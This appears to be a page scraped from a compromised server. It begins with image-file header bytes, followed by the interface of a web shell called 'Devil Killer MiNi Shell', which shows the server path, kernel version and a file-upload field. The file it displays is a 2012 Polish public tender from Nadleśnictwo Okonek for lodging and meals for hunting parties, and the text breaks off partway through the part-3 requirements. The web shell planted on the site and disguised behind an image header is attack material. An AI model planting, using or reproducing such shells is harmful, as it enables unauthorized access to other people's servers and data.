JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120423/129320-N-2012.html

<p class="kh_header"><b>Okonek: Przedmiotem zamówienia jest wykonanie usługi zakwaterowania i wyżywienia grup myśliwych i osób towarzyszących na polowaniach indywidualnych i zbiorowych</b><br>
<b>Numer ogłoszenia: 129320 - 2012; data zamieszczenia: 23.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Okonek , ul. Kolejowa 16, 64-965 Okonek, woj. wielkopolskie, tel. 067 2669101, 269102 w. 38, faks 067 2669519.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_pila/nadl_okonek/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie usługi zakwaterowania i wyżywienia grup myśliwych i osób towarzyszących na polowaniach indywidualnych i zbiorowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi zakwaterowania i wyżywienia grup myśliwych i osób towarzyszących na polowaniach indywidualnych i zbiorowych. Zamówienie jest podzielone na części i dotyczy:

1)	Część nr 1 - zakwaterowanie i wyżywienie gości na terenie lub w okolicy do 2 km obwodu łowieckiego nr 2 Nadleśnictwa Okonek. 

2)	Część nr 2 - zakwaterowanie i wyżywienie gości na terenie lub w okolicy do 2 km obwodu łowieckiego nr 2 Nadleśnictwa Okonek. 

3)	Część nr 3 - zakwaterowanie i wyżywienie gości na terenie lub w okolicy do 6 km obwodu łowieckiego nr 2 Nadleśnictwa Okonek.
4)	Część nr 4 - zakwaterowanie i wyżywienie gości na terenie lub w okolicy do 10 km obwodu łowieckiego nr 2 Nadleśnictwa Okonek.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych, stanowiących nie więcej niż 50% wartości zamówienia podstawowego                   i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.  SIWZ opisuje rodzaj usług, które zamawiający przewiduje zamówić  jako zamówienia uzupełniające. Kosztorys ofertowy określa podstawę do wyceny ewentualnych usług uzupełniających.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełnienia warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ NR 1
a)	doświadczeniem polegającym na wykonaniu co najmniej jednej usługi zakwaterowania                   i wyżywienia myśliwych o wartości co najmniej 1000 zł za jedną usługę. Wykonawca nie może sumować usług o mniejszej wartości celem uzyskania wymaganego warunku przez Zamawiającego. 
CZĘŚĆ NR 2
a)	doświadczeniem polegającym na wykonaniu co najmniej jednej usługi zakwaterowania                   i wyżywienia myśliwych o wartości co najmniej 1000 zł za jedną usługę. Wykonawca nie może sumować usług o mniejszej wartości celem uzyskania wymaganego warunku przez Zamawiającego. 
CZĘŚĆ NR 3
a)	doświadczeniem polegającym na wykonaniu co najmniej jednej usługi zakwaterowania                   i wyżywienia myśliwych o wartości co najmniej 2000 zł za jedną usługę. Wykonawca nie może sumować usług o mniejszej wartości celem uzyskania wymaganego warunku przez Zamawiającego. 
CZĘŚĆ NR 4
Zamawiający nie dokonuje opisu sposobu spełnienia warunku

Ocena spełniania w.w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdz. 6 SIWZ. Z  treści załączonych dokumentów musi wynikać jednoznacznie, iż w.w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ NR 1
Przynajmniej jedną przeznaczoną dla minimum 5 jednostek broni, szafką na broń, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 3.04.2000 r. w sprawie przechowywania, noszenia oraz ewidencjonowania broni i amunicji (Dz.U. nr 27 poz.343 z 2000 r.),
CZĘŚĆ NR 2
Przynajmniej jedną przeznaczoną dla minimum 5 jednostek broni, szafką na broń, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 3.04.2000 r. w sprawie przechowywania, noszenia oraz ewidencjonowania broni i amunicji (Dz.U. nr 27 poz.343 z 2000 r.),
CZĘŚĆ NR 3
Przynajmniej jedną przeznaczoną dla minimum 6 jednostek broni, szafką na broń, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 3.04.2000 r. w sprawie przechowywania, noszenia oraz ewidencjonowania broni i amunicji (Dz.U. nr 27 poz.343 z 2000 r.),
CZĘŚĆ NR 4
Przynajmniej jedną przeznaczoną dla minimum 15 jednostek broni, szafką na broń, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 3.04.2000 r. w sprawie przechowywania, noszenia oraz ewidencjonowania broni i amunicji (Dz.U. nr 27 poz.343 z 2000 r.),
Ocena spełniania w.w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdz. 6 SIWZ. Z  treści załączonych dokumentów musi wynikać jednoznacznie, iż w.w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełnienia warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełnienia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia o posiadaniu uprawnień z art.22 ust.1 ,  formularz ofertowy, kosztorys ofertowy, odpowiednie pełnomocnictwa</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 7 do SIWZ. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. 
2. Zamawiający przewiduje zmianę ceny oferty w sytuacji  zmiany obowiązującej stawki VAT,
3. Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadku wprowadzenia w życie, po podpisaniu umowy, regulacji prawnych wywołujących potrzebę zmiany umowy wraz ze skutkami wprowadzenia takiej zmiany.
4.  Nie stanowi istotnej zmiany umowy w rozumieniu art. 144 pzp, w szczególności:
a) zmiana danych związanych z obsługą administracyjno - organizacyjna umowy                          ( np. zmiana rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
b) zmiana danych teleadresowych oraz osób wskazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_pila/nadl_okonek/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Okonek
Ul. Kolejowa 16
64-965 Okonek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 08:00, miejsce: Nadleśnictwo Okonek
Ul. Kolejowa 16
64-965 Okonek, pokój nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest wykonanie usługi zakwaterowania i wyżywienia grup myśliwych i osób towarzyszących na polowaniach indywidualnych i zbiorowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakwaterowanie dotyczy ok. 25 szt. noclegów (osobodni) wraz ze śniadaniami oraz obiadami i kolacjami.
Zakwaterowanie myśliwych i osób towarzyszących na polowaniach indywidualnych w kwaterach w standardzie min. kat. I lub hotelu min. **, zgodnie z Rozporządzeniem Ministra  Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz. U. z 2006 r., nr 22, poz. 169 z późn. zm.), z wyposażeniem minimum:
- obiekt całoroczny, pokoje wyposażone w ogrzewanie,
- kwatera musi posiadać minimum 3 pokoje (dwa dwuosobowe i jeden jednoosobowy),
-  powierzchnia pokoi nie może być mniejsza niż 12 m2 dla pokoju dwuosobowego i 10 m2 dla pokoju jednoosobowego,
- pokoje z zestawem wyposażenia meblowego:
- łóżko - łóżka jednoosobowe lub łóżko dwuosobowe,
- nocny stolik lub półka przy każdym miejscu spania wraz z lampką nocną,
-  biurko lub stół,
-  krzesło - krzesła lub inny mebel do siedzenia,
-  wieszak ścienny na wierzchnią odzież.
-  obiekt wyposażony w łazienkę do wyłącznej dyspozycji myśliwych,
minimalne wyposażenie łazienki: umywalka z lustrem, kabina prysznicowa, muszla klozetowa,
-  instalacja sanitarna: ciepła i zimna woda przez całą dobę,
-	kwatera musi posiadać szafkę na broń (przynajmniej jedną przeznaczoną dla minimum 5 jednostek broni), zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 3.04.2000 r. w sprawie przechowywania, noszenia oraz ewidencjonowania broni i amunicji (Dz.U. nr 27 poz.343 z 2000 r.),
-bezpłatny parking dla osób zakwaterowanych w kwaterze lub hotelu,
-obiekt wyposażony w osobną salę do posiłków.
2)	wyżywienie:
-Śniadania mają być podawane w godz. od 7.00 do 10.00 
-Zapewnienie dodatkowo 2 posiłków dziennie tj. obiadu i kolacji. W pierwszym dniu pobytu Wykonawca zapewni (w zależności od pory przybycia gości do kwatery) obiad i-lub kolację.
- Przez zapewnienie wyżywienia Zamawiający wymaga przygotowania oraz podania gościom ww. posiłków, tj. śniadania, obiadu i kolacji.
-Obiady będą podawane gościom w godzinach 12.00 - 16.00.
-Kolacje będą podawane gościom w godzinach 18.00 - 22.00.
-możliwość spożywania posiłków na miejscu zakwaterowania,
-śniadanie składające się z:
1. dania ciepłe typu parówka, jajecznica lub inne podobne,
2. dania na zimno typu kanapki lub możliwość własnego zestawienia posiłku np. plastry szynki, kiełbasy, serów, chleb, masło itp.
-obiad składający się z dwóch dań na ciepło:
1. zupa np. pomidorowa, żurek,
2. drugie danie składające się z mięsa, ryb, ziemniaki lub inne, surówka, napój, bądź też równoważny zestaw,
- kolacja składająca się z:
1.danie na ciepło jak w przypadku śniadania, lecz nie powtarzające się w tym samym dniu i w dniu następnym, zarówno na śniadanie jak i na kolacje,
2.danie na zimno jak śniadanie;


-możliwość o każdej porze dnia, szczególnie przed i po polowaniu spożycia kawy, herbaty lub zimnego napoju;
-możliwość po wcześniejszym uzgodnieniu zorganizowania uroczystej obiadokolacji;
-możliwość zmian i ustalania innych godzin posiłków,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest wykonanie usługi zakwaterowania i wyżywienia grup myśliwych i osób towarzyszących na polowaniach indywidualnych i zbiorowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Zakwaterowanie dotyczy ok. 25 szt. noclegów (osobodni) wraz ze śniadaniami oraz obiadami i kolacjami.
Zakwaterowanie myśliwych i osób towarzyszących na polowaniach indywidualnych w kwaterach w standardzie min. kat. Ilub hotelu min. **, zgodnie z Rozporządzeniem Ministra  Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz. U. z 2006 r., nr 22, poz. 169 z późn. zm.), z wyposażeniem minimum:
-obiekt całoroczny, pokoje wyposażone w ogrzewanie,
- kwatera musi posiadać minimum 3 pokoje (dwuosobowe),
- powierzchnia pokoi nie może być mniejsza niż 12 m2 dla pokoju dwuosobowego,
-  pokoje z zestawem wyposażenia meblowego:
-  łóżka jednoosobowe 
- nocny stolik lub półka przy każdym miejscu spania wraz z lampką nocną,
- biurko lub stół,
- krzesło - krzesła lub inny mebel do siedzenia,
- wieszak ścienny na wierzchnią odzież.
- obiekt wyposażony w łazienkę do wyłącznej dyspozycji myśliwych,
- minimalne wyposażenie łazienki: umywalka z lustrem, kabina prysznicowa, muszla klozetowa,
- instalacja sanitarna: ciepła i zimna woda przez całą dobę,
- kwatera musi posiadać szafkę na broń (przynajmniej jedną przeznaczoną dla minimum 5 jednostek broni), zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 3.04.2000 r. w sprawie przechowywania, noszenia oraz ewidencjonowania broni i amunicji (Dz. U. nr 27 poz.343 z 2000 r.),
-bezpłatny parking dla osób zakwaterowanych w kwaterze lub hotelu,
-obiekt wyposażony w osobną salę do posiłków.

2)	wyżywienie:
-Śniadania mają być podawane w godz. od 7.00 do 10.00. 
- Zapewnienie dodatkowo 2 posiłków dziennie tj. obiadu i kolacji. W pierwszym dniu pobytu Wykonawca zapewni (w zależności od pory przybycia gości do kwatery) obiad i-lub kolację.
-Przez zapewnienie wyżywienia Zamawiający wymaga przygotowania oraz podania gościom ww. posiłków, tj. śniadania, obiadu i kolacji.
-Obiady będą podawane gościom w godzinach 12.00 - 16.00.
-Kolacje będą podawane gościom w godzinach 18.00 - 22.00.
- możliwość spożywania posiłków na miejscu zakwaterowania,
- śniadanie składające się z:
1.dania ciepłe typu parówka, jajecznica lub inne podobne,
2.dania na zimno typu kanapki lub możliwość własnego zestawienia posiłku np. plastry szynki, kiełbasy, serów, chleb, masło itp.
-obiad składający się z dwóch dań na ciepło:zupa np. pomidorowa, żurek,
-	drugie danie składające się z mięsa, ryb, ziemniaki lub inne, surówka, napój, bądź też równoważny zestaw,

-kolacja składająca się z:
1.danie na ciepło jak w przypadku śniadania, lecz nie powtarzające się w tym samym dniu i w dniu następnym, zarówno na śniadanie jak i na kolacje,
2. danie na zimno jak śniadanie;
-możliwość o każdej porze dnia, szczególnie przed i po polowaniu spożycia kawy, herbaty lub zimnego napoju;
- możliwość po wcześniejszym uzgodnieniu zorganizowania uroczystej obiadokolacji;
-	możliwość zmian i ustalania innych godzin posiłków,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest wykonanie usługi zakwaterowania i wyżywienia grup myśliwych i osób towarzyszących na polowaniach indywidualnych i zbiorowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Zakwaterowanie dotyczy ok. 15 szt. noclegów (osobodni) wraz ze śniadaniami oraz obiadami i kolacjami.
Zakwaterowanie myśliwych i osób towarzyszących na polowaniach indywidualnych w kwaterach w standardzie min. kat. I lub hotelu min. **, zgodnie z Rozporządzeniem Ministra  Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz. U. z 2006 r., nr 22, poz. 169 z późn. zm.), z wyposażeniem minimum:
-	obiekt całoroczny, pokoje wyposażone w ogrzewanie,
-	kwatera musi mieć osobne wejście dla myśliwych i być oddzielona od miejsca stałego przebywania mieszkańców bądź też być zlokalizowana w osobnym budynku,
-	kwatera musi posiadać minimum 6 pokoi (4 szt. dwuosobowych i 2 szt. trzyosobowych),   
-	powierzchnia pokoi nie może być mniejsza niż 12 m2 ,
-	 pokoje z zestawem wyposażenia meblowego:
-	 łóżka jednoosobowe 
-	nocny stolik lub półka przy każdym miejscu spania wraz z lampką nocną,
-	biurko lub stół,
-	krzesło - krzesła lub inny mebel do siedzenia,
-	wieszak ścienny na wierzchnią odzież.
-	kwatera ma być wyposażona w minimum 3 łazienki do wyłącznej dyspozycji myśliwych,
-	minimalne wyposażenie łazienki: umywalka z lustrem, kabina prysznicowa, muszla klozetowa,
-	instalacja sanitarna: ciepła i zimna woda przez całą dobę,
-	kwatera musi posiadać szafkę na broń (przynajmniej jedną przeznaczoną dla minimum 6 jednostek broni), zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 3.04.2000 r. w sprawie przechowywania, noszenia oraz ewidencjonowania broni i amunicji (Dz.U. nr 27 poz.343 z 2000 r.),
-	bezpłatny parking dla osób zakwaterowanych w kwaterze lub hotelu,
-	obiekt wyposażony w osobną salę do posiłków,
-	obiekt wyposażony w salonik z kominkiem.

2)	wyżywienie:
-	Śniadania mają być podawane w godz. od 7.00 do 10.00
-	Zapewnienie dodatkowo 2 posiłków dziennie tj. obiadu i kolacji. W pierwszym dniu pobytu Wykonawca zapewni (w zależności od pory przybycia gości do kwatery) obiad lub kolację.
-	Przez zapewnienie wyżywienia Zamawiający wymaga przygotowania oraz podania gościom ww. posiłków, tj. śniadania, obiadu i kolacji.


-	Obiady będą podawane gościom w godzinach 12.00 - 16.00.
-	Kolacje będą podawane gościom w godzinach 18.00 - 22.00.
